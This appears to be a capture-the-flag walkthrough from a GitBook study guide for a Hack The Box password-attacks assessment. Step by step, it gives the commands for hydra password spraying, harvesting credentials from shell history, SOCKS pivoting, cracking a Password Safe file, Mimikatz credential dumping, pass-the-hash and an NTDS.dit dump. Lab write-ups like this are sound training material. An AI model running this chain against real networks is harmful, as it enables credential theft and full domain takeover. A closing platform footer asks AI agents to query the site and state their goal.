> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/skill-assessment.md).

# Skill Assessment

Use this walkthrough to move from the first credential guess to full domain compromise.

### Notes

* Use `mget <file_name*>` when wildcard downloads fail with `get <file_name*>`.
* Do not run another VPN while connected to the HTB VPN.

### Phase 1 — Initial access

#### Generate candidate usernames

The attack starts with a public employee name:

```
Betty Jayde
```

Generate possible usernames with:

```bash
namebuster "Betty Jayde" > username.txt
```

This creates username variations based on common corporate naming patterns.

#### Spray the known password

Test the generated usernames against SSH:

```bash
hydra -L username.txt -p 'Texas123!@#' 10.129.234.116 ssh
```

#### Confirm the valid credential

Hydra returns a working login:

```
[22][ssh] host: 10.129.234.116 login: jbetty password: Texas123!@#
```

Credential recovered:

```
Username: jbetty
Password: Texas123!@#
```

#### Establish the foothold

Use the valid credential to access the DMZ host:

```bash
ssh j.betty@10.129.234.116
```

### Phase 2 — Internal enumeration and pivoting

#### Review local history

Check the user's shell history for reused commands and stored credentials:

```bash
cat ~/.bash_history
```

This reveals SSH credentials for `w.dealer-screwed` and points to an internal host named `file01`.

#### Identify the internal network

Inspect the network interfaces to confirm the internal subnet:

```bash
ifconfig
```

#### Create a SOCKS tunnel

To reach `file01`, create dynamic port forwarding through the current SSH session:

```bash
# Run from your attack machine
ssh -D 9050 j.betty@10.129.234.116
```

Ensure `/etc/proxychains4.conf` ends with:

```
socks4 127.0.0.1 9050
```

### Phase 3 — Extract the password safe

With the tunnel active, target `file01` using the credentials we found from the shell history.

#### Enumerate SMB shares

List and access the available shares over the tunnel:

```bash
# List available shares
proxychains smbclient -L //file01 -U '<user>'

# Connect to the HR share
proxychains smbclient //file01/HR -U '<user>'
```

Once connected, move to the archive directory and download the encrypted password database:

```
smb: \> cd archive
smb: \archive\> get Employee-Passwords_OLD.psafe3
```

#### Crack the `.psafe3` file

Convert the file into a John the Ripper hash, then crack it:

```bash
# Extract the hash
pwsafe2john Employee-Passwords_OLD.psafe3 > password.txt

# Crack the hash using rockyou
john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
```

John reveals the master password:

```
michaeljackson
```

#### Recover domain credentials

Open `Employee-Passwords_OLD.psafe3` in a Password Safe client with the cracked master password.

This reveals domain credentials for `bdavid`, `stom`, william.

### Phase 4 — Privilege escalation with Mimikatz

Use the newly recovered credentials for `bdavid` to access `file01` over RDP.

#### Authenticate as `bdavid`

```bash
proxychains xfreerdp /v:file01 /u:b.david /p:'<PASSWORD_FROM_SAFE>' /dynamic-resolution
```

#### Verify local admin rights

Check whether the account is in the local Administrators group:

```cmd
whoami /groups
```

This confirms that `bdavid` is a local Administrator on `file01`.

#### Dump in-memory credentials

Run Mimikatz to extract logon passwords and NTLM hashes:

```cmd
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
```

This exposes the NTLM hash for `stom`.

### Phase 5 — Domain compromise with pass-the-hash

Use `stom`'s NTLM hash to compromise the Domain Controller.

#### Verify access on the DC

Confirm authentication and group membership:

```bash
proxychains netexec smb <DC_IP> -u stom -H '<STOM_NTLM_HASH>' --whoami
proxychains netexec smb <DC_IP> -u stom -H '<STOM_NTLM_HASH>' --groups
```

This confirms that `stom` is a member of `Domain Admins`.

#### Dump `NTDS.dit`

Run the final `netexec` step to dump the directory database:

```bash
proxychains netexec smb <DC_IP> -u stom -H '<STOM_NTLM_HASH>' --ntds
```

This yields the Administrator hash and full domain compromise.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/skill-assessment.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
